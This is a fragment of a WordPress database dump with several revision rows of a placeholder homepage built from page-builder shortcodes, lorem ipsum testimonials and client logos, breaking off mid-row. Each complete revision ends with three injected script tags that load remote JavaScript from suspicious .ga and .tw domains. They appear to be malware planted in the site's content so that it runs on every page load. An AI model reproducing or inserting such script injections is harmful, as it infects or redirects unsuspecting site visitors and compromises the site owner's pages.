overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#d0d7dd\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#ff3a6f\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517243816062{margin-bottom: 10px !important;}\"]\r\n<h5>Call Us : 12345</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h5\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517243816062{margin-bottom: 10px !important;}\"]\r\n<h5>Call Us : 12345</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h5\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 00:36:37','2018-01-30 00:36:37','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6676,1,'2018-01-30 00:49:36','2018-01-30 00:49:36','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#a0a0a0\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 00:49:36','2018-01-30 00:49:36','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6677,1,'2018-01-30 00:50:27','2018-01-30 00:50:27','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#a0a0a0\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" 